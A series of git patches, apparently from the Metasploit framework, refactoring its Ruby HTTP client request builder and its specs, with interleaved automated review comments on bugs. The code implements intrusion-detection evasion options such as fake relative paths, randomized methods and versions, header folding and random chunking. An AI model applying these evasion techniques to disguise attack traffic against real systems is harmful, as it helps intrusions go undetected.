set_encode_uri(var) : var) pstr << '=' - pstr << (config['encode_params'] ? set_encode_uri(val) : val) + pstr << (opts['encode_params'] ? set_encode_uri(val) : val) end else uri_str = set_uri - if config['encode'] + if opts['encode'] qstr = set_encode_uri(qstr) end end @@ -166,7 +143,7 @@ class ClientRequest req << set_method_uri_spacer() req << set_uri_prepend() - if config['encode'] + if opts['encode'] req << set_encode_uri(uri_str) else req << uri_str 
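Review bot: `opts['vars_get'].each_pair` and `opts['vars_post'].each_pair` now depend on the merged defaults, but `Hash#merge` lets an explicit `nil` from the caller replace a default, where the removed `initialize` used `opts['vars_get'] || {}`. The same holds for `opts['headers'].keys` and `opts['method'].dup` in later hunks of this file, both of which were guarded with `||` before. A nil-tolerant form such as `(opts['vars_get'] || {}).each_pair do |var,val|` keeps the old behaviour. `to_s` starts before this hunk and continues after it.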
@@ -185,7 +162,7 @@ class ClientRequest req << set_host_header # If an explicit User-Agent header is set, then use that instead of the value of user_agent - unless headers.keys.map{|x| x.downcase }.include?('user-agent') + unless opts['headers'].keys.map{|x| x.downcase }.include?('user-agent') req << set_agent_header end @@ -197,19 +174,19 @@ class ClientRequest req << set_content_type_header req << set_content_len_header(pstr.length) req << set_chunked_header() - req << raw_headers + req << opts['raw_headers'] req << set_body(pstr) end protected def set_uri - uri_str = uri.dup - if (config['uri_dir_self_reference']) + uri_str = opts['uri'].dup + if (opts['uri_dir_self_reference']) uri_str.gsub!('/', '/./') end - if (config['uri_dir_fake_relative']) + if (opts['uri_dir_fake_relative']) buf = "" uri_str.split('/').each do |part| cnt = rand(8)+2 @@ -222,10 +199,10 @@ class ClientRequest uri_str = buf end - if (config['uri_full_url']) - url = self.ssl ? "https://" : "http://" - url << self.config['vhost'] - url << ((self.port == 80) ? "" : ":#{self.port}") + if (opts['uri_full_url']) + url = opts['ssl'] ? "https://" : "http://" + url << opts['vhost'] + url << ((opts['port'] == 80) ? "" : ":#{opts['port']}") url << uri_str url else @@ -234,12 +211,12 @@ class ClientRequest end def set_cgi - uri_str = uri.dup - if (config['uri_dir_self_reference']) + uri_str = opts['uri'].dup + if (opts['uri_dir_self_reference']) uri_str.gsub!('/', '/./') end - if (config['uri_dir_fake_relative']) + if (opts['uri_dir_fake_relative']) buf = "" uri_str.split('/').each do |part| cnt = rand(8)+2 @@ -254,10 +231,10 @@ class ClientRequest url = uri_str - if (config['uri_full_url']) - url = self.ssl ? "https" : "http" - url << self.config['vhost'] - url << (self.port == 80) ? "" : ":#{self.port}" + if (opts['uri_full_url']) + url = opts['ssl'] ? "https" : "http" + url << opts['vhost'] + url << (opts['port'] == 80) ? "" : ":#{opts['port']}" url << uri_str end 
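Review bot: The `uri_full_url` branch of `set_uri` builds the authority differently from `set_host_header` in the same file: `url << opts['vhost']` adds no brackets around an IPv6 literal, and `(opts['port'] == 80) ? "" : ":#{opts['port']}"` appends `:443` to an `https://` URL, while `set_host_header` brackets IPv6 hosts and treats both 80 and 443 as default ports. `url << opts['vhost']` also raises a TypeError when no `'vhost'` was supplied, since this commit's defaults do not define one. A small private helper that returns the bracketed host plus optional port, used by both methods, would keep them in agreement; the spec in this series currently expects the unbracketed form, so it would need to change with it. `set_uri` begins in the previous hunk.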
@@ -266,24 +243,24 @@ class ClientRequest def set_encode_uri(str) a = str.dup - config['uri_encode_count'].times { - a = Rex::Text.uri_encode(a, config['uri_encode_mode']) + opts['uri_encode_count'].times { + a = Rex::Text.uri_encode(a, opts['uri_encode_mode']) } return a end def set_method - ret = method.dup + ret = opts['method'].dup - if (config['method_random_valid']) + if (opts['method_random_valid']) ret = ['GET', 'POST', 'HEAD'][rand(3)] end - if (config['method_random_invalid']) + if (opts['method_random_invalid']) ret = Rex::Text.rand_text_alpha(rand(20)+1) end - if (config['method_random_case']) + if (opts['method_random_case']) ret = Rex::Text.to_rand_case(ret) end @@ -291,11 +268,11 @@ class ClientRequest end def set_method_uri_spacer - len = config['pad_method_uri_count'].to_i + len = opts['pad_method_uri_count'].to_i set = " " buf = "" - case config['pad_method_uri_type'] + case opts['pad_method_uri_type'] when 'tab' set = "\t" when 'apache' @@ -315,11 +292,11 @@ class ClientRequest def set_uri_prepend prefix = "" - if (config['uri_fake_params_start']) + if (opts['uri_fake_params_start']) prefix << '/%3fa=b/../' end - if (config['uri_fake_end']) + if (opts['uri_fake_end']) prefix << '/%20HTTP/1.0/../../' end @@ -331,7 +308,7 @@ class ClientRequest # TODO: # * Encode path information def set_path_info - path ? path : '' + opts['path_info'] ? opts['path_info'] : '' end # @@ -347,11 +324,11 @@ class ClientRequest # Return the spacing between the uri and the version # def set_uri_version_spacer - len = config['pad_uri_version_count'].to_i + len = opts['pad_uri_version_count'].to_i set = " " buf = "" - case config['pad_uri_version_type'] + case opts['pad_uri_version_type'] when 'tab' set = "\t" when 'apache' 
@@ -369,17 +346,17 @@ class ClientRequest # Return the HTTP version string # def set_version - ret = protocol + "/" + version + ret = opts['proto'] + "/" + opts['version'] - if (config['version_random_valid']) - ret = protocol + "/" + ['1.0', '1.1'][rand(2)] + if (opts['version_random_valid']) + ret = opts['proto'] + "/" + ['1.0', '1.1'][rand(2)] end - if (config['version_random_invalid']) + if (opts['version_random_invalid']) ret = Rex::Text.rand_text_alphanumeric(rand(20)+1) end - if (config['version_random_case']) + if (opts['version_random_case']) ret = Rex::Text.to_rand_case(ret) end @@ -390,7 +367,7 @@ class ClientRequest # Return a formatted header string # def set_formatted_header(var, val) - if (self.config['header_folding']) + if (self.opts['header_folding']) "#{var}:\r\n\t#{val}\r\n" else "#{var}: #{val}\r\n" 
@@ -401,38 +378,38 @@ class ClientRequest # Return the HTTP agent header # def set_agent_header - user_agent ? set_formatted_header("User-Agent", user_agent) : "" + opts['agent'] ? set_formatted_header("User-Agent", opts['agent']) : "" end def set_auth_header - authorization ? set_formatted_header("Authorization", authorization) : "" + opts['authorization'] ? set_formatted_header("Authorization", opts['authorization']) : "" end # # Return the HTTP cookie header # def set_cookie_header - cookie ? set_formatted_header("Cookie", cookie) : "" + opts['cookie'] ? set_formatted_header("Cookie", opts['cookie']) : "" end # # Return the HTTP connection header # def set_connection_header - connection ? set_formatted_header("Connection", connection) : "" + opts['connection'] ? set_formatted_header("Connection", opts['connection']) : "" end # # Return the content type header # def set_content_type_header - set_formatted_header("Content-Type", content_type) + opts['ctype'] ? set_formatted_header("Content-Type", opts['ctype']) : "" end # # Return the content length header def set_content_len_header(clen) - return "" if config['chunked_size'] > 0 + return "" if opts['chunked_size'] > 0 set_formatted_header("Content-Length", clen) end @@ -440,8 +417,8 @@ class ClientRequest # Return the HTTP Host header # def set_host_header - return "" if config['uri_full_url'] - host ||= config['vhost'] + return "" if opts['uri_full_url'] + host ||= opts['vhost'] # IPv6 addresses must be placed in brackets if Rex::Socket.is_ipv6?(host) @@ -449,8 +426,8 @@ class ClientRequest end # The port should be appended if non-standard - if not [80,443].include?(port) - host = host + ":#{port}" + if not [80,443].include?(opts['port']) + host = host + ":#{opts['port']}" end set_formatted_header("Host", host) 
@@ -462,8 +439,8 @@ class ClientRequest def set_extra_headers buf = '' - if (config['pad_fake_headers']) - 1.upto(config['pad_fake_headers_count'].to_i) do |i| + if (opts['pad_fake_headers']) + 1.upto(opts['pad_fake_headers_count'].to_i) do |i| buf << set_formatted_header( Rex::Text.rand_text_alphanumeric(rand(32)+1), Rex::Text.rand_text_alphanumeric(rand(32)+1) @@ -471,7 +448,7 @@ class ClientRequest end end - headers.each_pair do |var,val| + opts['headers'].each_pair do |var,val| buf << set_formatted_header(var, val) end @@ -479,7 +456,7 @@ class ClientRequest end def set_chunked_header - return "" if config['chunked_size'] == 0 + return "" if opts['chunked_size'] == 0 set_formatted_header('Transfer-Encoding', 'chunked') end @@ -487,11 +464,11 @@ class ClientRequest # Return the HTTP seperator and body string # def set_body(bdata) - return "\r\n" + bdata if config['chunked_size'] == 0 + return "\r\n" + bdata if opts['chunked_size'] == 0 str = bdata.dup chunked = '' while str.size > 0 - chunk = str.slice!(0,rand(config['chunked_size']) + 1) + chunk = str.slice!(0,rand(opts['chunked_size']) + 1) chunked << sprintf("%x", chunk.size) + "\r\n" + chunk + "\r\n" end "\r\n" + chunked + "0\r\n\r\n" diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 154a1a9485..29db9873bf 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -4,7 +4,7 @@ require 'rex/proto/http/client_request' shared_context "with 'uri_dir_self_reference'" do before(:all) do - client_request.config['uri_dir_self_reference'] = true + client_request.opts['uri_dir_self_reference'] = true end it "should return the unmodified uri" do 
@@ -14,9 +14,9 @@ end shared_context "with no evasions" do before(:all) do - client_request.config['uri_dir_self_reference'] = false - client_request.config['uri_fake_params_start'] = false - client_request.config['uri_full_url'] = false + client_request.opts['uri_dir_self_reference'] = false + client_request.opts['uri_fake_params_start'] = false + client_request.opts['uri_full_url'] = false end it "should return the unmodified uri" do @@ -27,11 +27,11 @@ end shared_context "with 'uri_full_url'" do before(:all) do - client_request.config['uri_full_url'] = true + client_request.opts['uri_full_url'] = true end before(:each) do - client_request.config['vhost'] = host + client_request.opts['vhost'] = host end context "with ipv4 host" do @@ -43,7 +43,7 @@ shared_context "with 'uri_full_url'" do context "with ipv6 host" do let(:host) { '2001:DB8::1' } #before(:each) do - # client_request.config['vhost'] = "[#{host}]" + # client_request.opts['vhost'] = "[#{host}]" #end it_behaves_like "uri_full_url" @@ -83,9 +83,7 @@ describe Rex::Proto::Http::ClientRequest do [ "with reasonable default options", default_options.merge({ 'agent' => "Mozilla/4.0 (compatible; Metasploit RSPEC)", - # Yes, vhost is in the config. There is no godly reason why this - # should be so. - 'client_config' => { 'vhost' => 'www.example.com', }, + 'vhost' => 'www.example.com', }), { :set_cgi => { :result => "/" }, @@ -106,7 +104,7 @@ describe Rex::Proto::Http::ClientRequest do [ "with header folding", default_options.merge({ 'agent' => "Mozilla/4.0 (compatible; Metasploit RSPEC)", - 'client_config' => { 'header_folding' => true, } + 'header_folding' => true, }), { :set_uri => { :result => "/" }, @@ -124,7 +122,7 @@ describe Rex::Proto::Http::ClientRequest do [ "with ipv6 host", default_options.merge({ - 'client_config' => { 'vhost' => "2001:DB8::1" }, + 'vhost' => "2001:DB8::1", }), { :set_host_header => { :result => "Host: [2001:DB8::1]\r\n" }, 
@@ -134,7 +132,7 @@ describe Rex::Proto::Http::ClientRequest do [ "with ipv6 host and non-default port", default_options.merge({ 'port' => 1234, - 'client_config' => { 'vhost' => "2001:DB8::1" }, + 'vhost' => "2001:DB8::1", }), { :set_host_header => { :result => "Host: [2001:DB8::1]:1234\r\n" }, @@ -162,11 +160,9 @@ describe Rex::Proto::Http::ClientRequest do context "with GET paramaters" do subject(:client_request) { options_with_params = default_options.merge({ - 'client_config' => { - 'uri_encode_mode' => encode_mode, - 'encode_params' => encode_params, - 'encode' => false, - }, + 'uri_encode_mode' => encode_mode, + 'encode_params' => encode_params, + 'encode' => false, 'vars_get' => vars_get, }) Rex::Proto::Http::ClientRequest.new(options_with_params) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index 8dc10b8c46..11177b90fe 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -56,8 +56,6 @@ describe Rex::Proto::Http::Client do req = cli.request_cgi req.should be_a_kind_of Rex::Proto::Http::ClientRequest - req.port.should == 80 - req.ssl.should be_false end it "should attempt to connect to a server" do From b0745b090ac4698d54097f383f5ea7486c6f2ba8 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 27 Feb 2013 17:54:31 -0600 Subject: [PATCH 48/87] Msf HTTP uses this directly, can't axe it --- lib/rex/proto/http/client.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index b10af20c3c..be7b6cb436 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -23,6 +23,7 @@ module Http ### class Client + DefaultUserAgent = ClientRequest::DefaultUserAgent # # Creates a new client instance From 16bba7a6aca24d1dd28cddab66595d81d753f98d Mon Sep 17 00:00:00 2001 
From: James Lee Date: Wed, 27 Feb 2013 18:06:55 -0600 Subject: [PATCH 49/87] Add test for pad_get_params --- .../lib/rex/proto/http/client_request_spec.rb | 20 +++++++++++++++++-- 1 file changed, 18 insertions(+), 2 deletions(-) diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 29db9873bf..26729dfa52 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -178,6 +178,22 @@ describe Rex::Proto::Http::ClientRequest do } end + context "with 'pad_get_params'" do + let(:encode_params) { true } + it "should ..." do + old = client_request.opts['pad_get_params'] + client_request.opts['pad_get_params'] = true + + client_request.opts['pad_get_params_count'] = 0 + client_request.to_s.split("&").length.should == vars_get.length + + client_request.opts['pad_get_params_count'] = 10 + client_request.to_s.split("&").length.should == vars_get.length + 10 + + client_request.opts['pad_get_params'] = old + end + end + context "without 'encode_params'" do let(:encode_params) { false } it "should contain the unaltered params" do @@ -190,7 +206,7 @@ describe Rex::Proto::Http::ClientRequest do context "with 'encode_params'" do let(:encode_params) { true } - context "with 'uri_encode_mode' = default (hex-normal)" do + context "and 'uri_encode_mode' = default (hex-normal)" do it "should encode special chars" do str = client_request.to_s str.should include("foo%5b%5d=bar") @@ -199,7 +215,7 @@ describe Rex::Proto::Http::ClientRequest do end end - context "with 'uri_encode_mode' = hex-all" do + context "and 'uri_encode_mode' = hex-all" do let(:encode_mode) { 'hex-all' } it "should encode all chars" do str = client_request.to_s From 425c245771f68e69b5b90ac5e6b984d10f9bfc58 Mon Sep 17 00:00:00 2001 
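Review bot: The new example is declared as `it "should ..." do`, which will appear in spec output as a placeholder; a description such as `it "should add pad_get_params_count random GET parameters" do` says what is being checked. The count comes from `client_request.to_s.split("&").length`, which counts every `&` in the whole serialized request rather than in the query string, so it holds only while no header or body contains one. The manual save and restore of `pad_get_params` is skipped when an expectation fails; whether that can affect other examples depends on how `client_request` is memoized, which is partly outside this hunk.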
From: James Lee Date: Wed, 27 Feb 2013 19:13:05 -0600 Subject: [PATCH 50/87] Axe set_cgi in favor of set_uri They were identical except for a couple of extra bugs in set_cgi. Also changes ```split("/")``` to ```split("/", -1)```, which behaves correctly when the input has a seperator at the beginning or end. --- lib/rex/proto/http/client_request.rb | 38 ++---------------- .../lib/rex/proto/http/client_request_spec.rb | 40 ++++++++++++------- 2 files changed, 30 insertions(+), 48 deletions(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 31933fe5f7..62e1ede0e8 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -32,6 +32,7 @@ class ClientRequest 'vars_get' => {}, 'vars_post' => {}, 'version' => '1.1', + 'vhost' => nil, # # Evasion options @@ -96,7 +97,7 @@ class ClientRequest pstr = opts['data'] ? opts['data'].dup : "" if opts['cgi'] - uri_str= set_cgi + uri_str = set_uri if (opts['pad_get_params']) 1.upto(opts['pad_get_params_count'].to_i) do |i| @@ -132,10 +133,10 @@ class ClientRequest pstr << (opts['encode_params'] ? set_encode_uri(val) : val) end else - uri_str = set_uri if opts['encode'] qstr = set_encode_uri(qstr) end + uri_str = set_uri end req = '' @@ -188,7 +189,7 @@ class ClientRequest if (opts['uri_dir_fake_relative']) buf = "" - uri_str.split('/').each do |part| + uri_str.split('/',-1).each do |part| cnt = rand(8)+2 1.upto(cnt) { |idx| buf << "/" + Rex::Text.rand_text_alphanumeric(rand(32)+1) 
@@ -210,37 +211,6 @@ class ClientRequest end end - def set_cgi - uri_str = opts['uri'].dup - if (opts['uri_dir_self_reference']) - uri_str.gsub!('/', '/./') - end - - if (opts['uri_dir_fake_relative']) - buf = "" - uri_str.split('/').each do |part| - cnt = rand(8)+2 - 1.upto(cnt) { |idx| - buf << "/" + Rex::Text.rand_text_alphanumeric(rand(32)+1) - } - buf << ("/.." * cnt) - buf << "/" + part - end - uri_str = buf - end - - url = uri_str - - if (opts['uri_full_url']) - url = opts['ssl'] ? "https" : "http" - url << opts['vhost'] - url << (opts['port'] == 80) ? "" : ":#{opts['port']}" - url << uri_str - end - - url - end - def set_encode_uri(str) a = str.dup opts['uri_encode_count'].times { diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 26729dfa52..426721cb6c 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -2,15 +2,6 @@ require 'spec_helper' require 'rex/proto/http/client_request' -shared_context "with 'uri_dir_self_reference'" do - before(:all) do - client_request.opts['uri_dir_self_reference'] = true - end - - it "should return the unmodified uri" do - client_request.send(:set_uri).should == "/./" - end -end shared_context "with no evasions" do before(:all) do @@ -24,6 +15,30 @@ shared_context "with no evasions" do end end + +shared_context "with 'uri_dir_self_reference'" do + before(:all) do + client_request.opts['uri_dir_self_reference'] = true + end + + it "should have a self reference" do + client_request.send(:set_uri).should == "/./" + end +end + + +shared_context "with 'uri_dir_fake_relative'" do + before(:all) do + client_request.opts['uri_dir_fake_relative'] = true + end + + it "should contain sequences of '../'" do + client_request.send(:set_uri).should include("../") + end + +end + + shared_context "with 'uri_full_url'" do before(:all) do 
@@ -42,9 +57,6 @@ shared_context "with 'uri_full_url'" do context "with ipv6 host" do let(:host) { '2001:DB8::1' } - #before(:each) do - # client_request.opts['vhost'] = "[#{host}]" - #end it_behaves_like "uri_full_url" end @@ -59,7 +71,7 @@ end shared_examples "uri_full_url" do - it "should have the host in the URI" do + it "#set_uri should have the host in the URI" do client_request.send(:set_uri).should start_with("http://#{host}/") end @@ -86,7 +98,6 @@ describe Rex::Proto::Http::ClientRequest do 'vhost' => 'www.example.com', }), { - :set_cgi => { :result => "/" }, :set_uri => { :result => "/" }, :set_method => { :result => "GET" }, :set_version => { :result => "HTTP/1.1\r\n" }, @@ -238,6 +249,7 @@ describe Rex::Proto::Http::ClientRequest do describe "#set_uri" do it_behaves_like "with 'uri_full_url'" it_behaves_like "with 'uri_dir_self_reference'" + it_behaves_like "with 'uri_dir_fake_relative'" it_behaves_like "with no evasions" end From 5a79fcd11e516c17abaa4ef9a7fce956b31d7518 Mon Sep 17 00:00:00 2001 From: James Lee Date: Thu, 28 Feb 2013 13:47:30 -0600 Subject: [PATCH 51/87] Ensure we build only one Authorization header Also fixes an issue where Host headers were generated with nil by preferring the vhost from Client instead of the default nil from ClientRequest. --- lib/rex/proto/http/client.rb | 58 +++++++------------ lib/rex/proto/http/client_request.rb | 18 +++++- .../lib/rex/proto/http/client_request_spec.rb | 4 +- spec/lib/rex/proto/http/client_spec.rb | 49 ++++++++++++++++ 4 files changed, 89 insertions(+), 40 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index be7b6cb436..38b5c3ac2b 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb 
@@ -38,11 +38,13 @@ class Client self.username = username self.password = password - self.config = { + # Take ClientRequest's defaults, but override with our own + self.config = Http::ClientRequest::DefaultConfig.merge({ 'read_max_data' => (1024*1024*1), 'vhost' => self.hostname, - }.merge(Http::ClientRequest::DefaultConfig) + }) + # XXX: This info should all be controlled by ClientRequest self.config_types = { 'uri_encode_mode' => ['hex-normal', 'hex-all', 'hex-random', 'u-normal', 'u-random', 'u-all'], 'uri_encode_count' => 'integer', @@ -104,7 +106,6 @@ class Client self.config[var]=val end - end # @@ -145,12 +146,6 @@ class Client opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' opts['version'] = opts['version'] || config['version'] || '1.1' - opts['client_config'] = self.config - - if opts['basic_auth'] and not opts['authorization'] - opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) - end - req = ClientRequest.new(opts) end 
@@ -167,28 +162,26 @@ class Client # # @return [ClientRequest] def request_cgi(opts={}) - opts['agent'] ||= config['agent'] - opts['data'] ||= '' - opts['uri'] ||= '/' - opts['cookie'] ||= config['cookie'] - opts['encode'] ||= false - opts['headers'] ||= config['headers'] || {} - opts['vhost'] ||= config['vhost'] - opts['method'] ||= 'GET' - opts['proto'] ||= 'HTTP' - opts['query'] ||= '' - opts['ctype'] ||= 'application/x-www-form-urlencoded' - opts['vars_get'] ||= {} - opts['vars_post'] ||= {} + opts['agent'] ||= config['agent'] + opts['basic_auth'] ||= config['basic_auth'] || '' + opts['cookie'] ||= config['cookie'] + opts['ctype'] ||= 'application/x-www-form-urlencoded' + opts['data'] ||= '' + opts['encode'] ||= false + opts['headers'] ||= config['headers'] || {} + opts['method'] ||= 'GET' + opts['proto'] ||= 'HTTP' + opts['query'] ||= '' + opts['raw_headers'] ||= config['raw_headers'] || '' + opts['uri'] ||= '/' + opts['vars_get'] ||= {} + opts['vars_post'] ||= {} + opts['version'] ||= config['version'] || '1.1' + opts['vhost'] ||= config['vhost'] opts['ssl'] = self.ssl opts['cgi'] = true opts['port'] = self.port - opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' - opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' - opts['version'] = opts['version'] || config['version'] || '1.1' - - opts['client_config'] = self.config if opts['encode_params'] == true or opts['encode_params'].nil? opts['encode_params'] = true @@ -196,10 +189,6 @@ class Client opts['encode_params'] = false end - if opts['basic_auth'] and not opts['authorization'] - opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) - end - req = ClientRequest.new(opts) end 
@@ -321,11 +310,8 @@ class Client return res if opts['username'].nil? or opts['username'] == '' supported_auths = res.headers['WWW-Authenticate'] if supported_auths.include? 'Basic' - if opts['headers'] - opts['headers']['Authorization'] = basic_auth_header(opts['username'],opts['password'] ) - else - opts['headers'] = { 'Authorization' => basic_auth_header(opts['username'],opts['password'] )} - end + opts['headers'] ||= {} + opts['headers']['Authorization'] = basic_auth_header(opts['username'],opts['password'] ) req = request_cgi(opts) res = _send_recv(req,t,persist) return res diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 62e1ede0e8..039d11559d 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -86,6 +86,12 @@ class ClientRequest def initialize(opts={}) @opts = DefaultConfig.merge(opts) + + # Backwards compatibility for wonky basic authentication api from + # the dawn of time. + if opts['basic_auth'] and not opts['authorization'] + @opts['authorization'] = "Basic #{Rex::Text.encode_base64(opts['basic_auth'])}" + end end def to_s @@ -162,12 +168,18 @@ class ClientRequest req << set_version req << set_host_header - # If an explicit User-Agent header is set, then use that instead of the value of user_agent + # If an explicit User-Agent header is set, then use that instead of + # the default unless opts['headers'].keys.map{|x| x.downcase }.include?('user-agent') req << set_agent_header end - req << set_auth_header + # Similar to user-agent, only add an automatic auth header if a + # manual one hasn't been provided + unless opts['headers'].keys.map{|x| x.downcase }.include?('authorization') + req << set_auth_header + end + req << set_cookie_header req << set_connection_header req << set_extra_headers 
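Review bot: The compatibility branch added to `ClientRequest#initialize` tests `opts['basic_auth']` for truthiness, but the `request_cgi` hunk in client.rb defaults it with `opts['basic_auth'] ||= config['basic_auth'] || ''`, and an empty String is truthy in Ruby. As written, a CGI request with no credentials configured appears to get an `Authorization: Basic` header carrying an empty credential. Checking for content as well fixes it: `if opts['basic_auth'] and not opts['basic_auth'].empty? and not opts['authorization']`. Defaulting `basic_auth` to `nil` instead of `''` in `request_cgi` would have the same effect.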
@@ -388,7 +400,7 @@ class ClientRequest # def set_host_header return "" if opts['uri_full_url'] - host ||= opts['vhost'] + host = opts['vhost'] # IPv6 addresses must be placed in brackets if Rex::Socket.is_ipv6?(host) diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 426721cb6c..3bf44fcaa4 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -22,7 +22,8 @@ shared_context "with 'uri_dir_self_reference'" do end it "should have a self reference" do - client_request.send(:set_uri).should == "/./" + client_request.send(:set_uri).should include("/./") + client_request.to_s.should include("/./") end end @@ -34,6 +35,7 @@ shared_context "with 'uri_dir_fake_relative'" do it "should contain sequences of '../'" do client_request.send(:set_uri).should include("../") + client_request.to_s.should include("../") end end diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index 11177b90fe..bb2f642e38 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb 
@@ -55,6 +55,55 @@ describe Rex::Proto::Http::Client do it "should produce a CGI HTTP request" do req = cli.request_cgi req.should be_a_kind_of Rex::Proto::Http::ClientRequest + end + + context "with authorization" do + subject(:cli) do + cli = Rex::Proto::Http::Client.new(ip) + cli.set_config({"authorization" => "Basic base64dstuffhere"}) + cli + end + let(:user) { "user" } + let(:pass) { "pass" } + let(:base64) { ["user:pass"].pack('m').chomp } + + context "and an Authorization header" do + before do + cli.set_config({"headers" => { "Authorization" => "Basic #{base64}" } }) + end + it "should have one Authorization header" do + req = cli.request_cgi + match = req.to_s.match("Authorization: Basic") + match.should be + match.length.should == 1 + end + it "should prefer the value in the header" do + req = cli.request_cgi + match = req.to_s.match(/Authorization: Basic (.*)$/) + match.should be + match.captures.length.should == 1 + match.captures[0].chomp.should == base64 + end + end + + context "and basic_auth" do + before do + cli.set_config({"basic_auth" => "user:pass"}) + end + it "should not have two Authorization headers" do + req = cli.request_cgi + match = req.to_s.match("Authorization: Basic") + match.should be + match.length.should == 1 + end + it "should prefer basic_auth" do + req = cli.request_cgi + match = req.to_s.match(/Authorization: Basic (.*)$/) + match.should be + match.captures.length.should == 1 + match.captures[0].chomp.should == base64 + end + end end From 239e1934b8bc8d84b6daa1cbcef29b98aba41575 Mon Sep 17 00:00:00 2001 
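Review bot: `match.length.should == 1` in "should have one Authorization header" and "should not have two Authorization headers" cannot fail on a duplicated header. `String#match` returns only the first match, and `MatchData#length` counts the whole match plus its capture groups, which is always 1 for a pattern without groups. Counting occurrences tests what the example names say: `req.to_s.scan("Authorization: Basic").length.should == 1`. The two "should prefer" examples have the same limit, since `match.captures[0]` is read from the first header only. `let(:user)` and `let(:pass)` are defined but unused in the hunk, so `base64` could be built from them; the enclosing `describe` block continues outside the hunk.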
From: Luke Imhoff Date: Fri, 1 Mar 2013 09:03:45 -0600 Subject: [PATCH 52/87] Use migrations from metasploit_data_models [#44034071] metasploit_data_models version 0.5.0 copied the migrations from metasploit-framework/data/sql/migrate to metasploit_data_models/db/migrate so that specs could be written the Mdm models in metasploit_data_models. As part of the specs, :null => false columns that should be :null => true were discovered, so a new migration was added, but to metasploit_data_models/db/migrate, so it could be tested. Instead of replicating migrations back and forth, I'm removing the migrations completely from metasploit-framework and changing the default migration path in Msf::DbManager#migration_paths to MetasploitDataModels.root.join('db', 'migrate'). --- Gemfile | 2 +- Gemfile.lock | 14 +- data/sql/migrate/000_create_tables.rb | 79 --------- data/sql/migrate/001_add_wmap_tables.rb | 35 ---- data/sql/migrate/002_add_workspaces.rb | 36 ---- data/sql/migrate/003_move_notes.rb | 20 --- data/sql/migrate/004_add_events_table.rb | 16 -- data/sql/migrate/005_expand_info.rb | 58 ------- data/sql/migrate/006_add_timestamps.rb | 26 --- data/sql/migrate/007_add_loots.rb | 20 --- data/sql/migrate/008_create_users.rb | 16 -- data/sql/migrate/009_add_loots_ctype.rb | 10 -- data/sql/migrate/010_add_alert_fields.rb | 16 -- data/sql/migrate/011_add_reports.rb | 19 --- data/sql/migrate/012_add_tasks.rb | 24 --- data/sql/migrate/013_add_tasks_result.rb | 10 -- data/sql/migrate/014_add_loots_fields.rb | 12 -- data/sql/migrate/015_rename_user.rb | 16 -- data/sql/migrate/016_add_host_purpose.rb | 10 -- data/sql/migrate/017_expand_info2.rb | 58 ------- .../migrate/018_add_workspace_user_info.rb | 29 ---- data/sql/migrate/019_add_workspace_desc.rb | 23 --- data/sql/migrate/020_add_user_preferences.rb | 11 -- .../migrate/021_standardize_info_and_data.rb | 18 -- data/sql/migrate/022_enlarge_event_info.rb | 10 -- .../migrate/023_add_report_downloaded_at.rb | 10 -- 
.../024_convert_service_info_to_text.rb | 12 -- data/sql/migrate/025_add_user_admin.rb | 19 --- data/sql/migrate/026_add_creds_table.rb | 19 --- .../20100819123300_migrate_cred_data.rb | 154 ------------------ .../20100824151500_add_exploited_table.rb | 16 -- .../20100908001428_add_owner_to_workspaces.rb | 9 - .../20100911122000_add_report_templates.rb | 18 -- .../20100916151530_require_admin_flag.rb | 15 -- ...00916175000_add_campaigns_and_templates.rb | 61 ------- .../20100920012100_add_generate_exe_column.rb | 8 - .../20100926214000_add_template_prefs.rb | 11 -- .../migrate/20101001000000_add_web_tables.rb | 57 ------- data/sql/migrate/20101002000000_add_query.rb | 10 -- .../migrate/20101007000000_add_vuln_info.rb | 15 -- ...20101008111800_add_clients_to_campaigns.rb | 10 -- ...20101009023300_add_campaign_attachments.rb | 15 -- .../20101104135100_add_imported_creds.rb | 17 -- .../migrate/20101203000000_fix_web_tables.rb | 34 ---- .../20101203000001_expand_host_comment.rb | 12 -- ...2033_add_limit_to_network_to_workspaces.rb | 9 - ...20110112154300_add_module_uuid_to_tasks.rb | 9 - .../migrate/20110204112800_add_host_tags.rb | 28 ---- .../20110317144932_add_session_table.rb | 110 ------------- ...414180600_add_local_id_to_session_table.rb | 11 -- .../20110415175705_add_routes_table.rb | 18 -- 